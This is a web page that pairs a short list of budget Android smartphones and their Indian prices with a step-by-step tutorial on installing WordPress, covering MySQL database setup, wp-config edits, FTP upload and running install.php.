Samsung Galaxy Fit: Galaxy Fit’s features include 3.31-inch QVGA TFT display, 5-megapixel autofocus camera, Social Hub, TouchWiz interface, Swype, document viewer, Quad-band GSM, HSDPA, A-GPS, Bluetooth, and Wi-Fi.

Price: INR 10,500

Samsung Galaxy Pop: Samsung Galaxy Pop festures include Android 2.2 Froyo, 3.14-inch QVGA TFT display, 600MHz processor, 3-megapixel fixed-focus camera, Social Hub, TouchWiz , nterface, Swype, document viewer, Quad-band GSM, HSDPA, A-GPS, Bluetooth, and Wi-Fi

Price: INR 8,999

LG Optimus One [Cricket World Cup Limited Edition]: This limited edition Optimus One comes with shiny gold World Cup logo engraved on it back along with other style tweaks in the smartphone. To remind you of LG Optimus One specifications, it comes with Android 2.2 on board, company has promised Gingerbread update. Other features include 3.2 inch display, 3MP camera, 600 Mhz processor, 170 MB of internal memory with microSD card support, and 1500 mAh battery.

Price: INR 12,500

Huawei Ideos: Ideos features Android 2.2 FroYo, 2.8-inch capacitive touchscreen, 528MHz processor, 3.2MP camera, proximity and accelerometer sensors built in, MicroSD storage, Android UI, HSDPA, Bluetooth and Wi-FI connectivity.

Price: INR 8,449

Step by Step WordPress Setup

Installing WordPress Blog to Your Web Host Account
Although the WordPress installation is much easier than most people realize, you will save yourself a lot of frustration if you take some time to prepare first.
If you can host multiple domains with your hosting company, I recommend using a totally separate domain for your blog. At the very least you will need a subdomain.
Verify that your web hosting company supports the following programs.

• PHP version 4.2 or greater
• MySQL version version 4.0 or greater
• The Apache mod_rewrite module

You must also have an FTP program of some sort for uploading your files. This will also allow us to change permission on files as needed.

I fully recommend using a hosting company that uses a Linux based server. This may also be listed as Unix or Apache. I do not recommend using a Windows based server.

If you are unsure of the server used by your hosting company, you can determine this by doing a header check of your domain. Insert the URL of your site and click submit. The information returned will include the server type.

If your server does not support or provide the features you need to effectively run your online business, you should seriously consider moving to a reliable hosting company that will meet all of your business needs both now, and in the future.

I personally use and fully recommend 1and1 Hosting Services. They also allow you to host multiple domains in one account without increasing your hosting fees. Feel free to contact me if you need help selecting the best hosting package to meet your needs.

Getting Started with MySQL

Setup your MySQL database from within your control panel, or in some cases you will need to contact  your host to set it up. SAVE the following information:

• Database Name
• User Name
• Password
• Host Name

Download and Configure WordPress

Download the WordPress directory from wordpress.org to your desktop where you can easily find it. The file will need to be unzipped in order to access the files.

Once you have downloaded and unzipped WordPress, we will  need to make a few changes BEFORE uploading the files.

Inside the WordPress folder is a file named wp-config-sample. Change that file name to wp-config.

Open the same file that you just renamed. Within that file you will see the following:

define(‘DB_NAME’, ‘wordpress’); // The name of the database
define(‘DB_USER’, ‘username’); // Your MySQL username
define(‘DB_PASSWORD’, ‘password’); // …and password
define(‘DB_HOST’, ‘localhost’); // 99% chance you won’t need to change this value

We will be changing some of this information to include your data base information.

Insert Your MySQL Database Information

When you previously set up the MySQL database you would have been provided with the following information:

• The name of the database
• The MySQL database username
• The password of the database
• The database host (in some cases)

We need to change the default information in the wp-config to include your information. The following will cover those changes line by line. Do not remove the single quotes.

define(‘DB_NAME’, ‘wordpress’); // The name of the database

Change the highlighted area of the line above to the actual name of your database that you were given when you set up the database.

define(‘DB_USER’, ‘username’); // Your MySQL username

Change the highlighted area above to the username you were given when you set up the database.

define(‘DB_PASSWORD’, ‘password’); // …and password

Change the highlighted area of the line above to the password you were given when you set up the database.

define(‘DB_HOST’, ‘localhost’); // chance you won’t need to change.

If you were given information for the database host, you will likely need to change the highlighted area of the line above to the data you were given when you set up the database. If you were not given this information it is very likely you can leave this set to localhost.

Once you have completed the above, SAVE the changes you have made.

Upload WordPress Files

Using your FTP program, upload all of the files from within the WordPress folder. You will upload these files to the directory you have previously selected for your blog. Only upload the files INSIDE the WordPress folder. DO NOT upload the folder itself.

I personally use WS_FTP Pro. However, it is not a free program. If you need an FTP program available at no cost, you may want to consider FileZilla.

Begin the WordPress Installation

To begin the WordPress installation, you will need to run the WordPress installation script by accessing the wp-admin/install.php file from your browser window.

Example: http://www.madeupsite.com/wp-admin/install.php

In the address bar of your browser window, enter the URL of  the domain or subdomain where you uploaded the WordPress files to, followed by: wp-admin/install.php

A new window will open. Click First Step >>

When you click the First Step link, another new window will open.

1. Enter the name you have selected for your blog.
   
2. Enter your email address and double check it before continuing.
   
3. Place a check in the box for I would like my blog to appear in search engines like Google and Technorati. (This is important!)
   
4. Click “Continue to Second Step”.

Once you have followed the instructions on each new window, your blog will be created automatically for you. Make sure to save the user name and password provided.

That’s it for the basic WordPress Setup. You are ready to log in!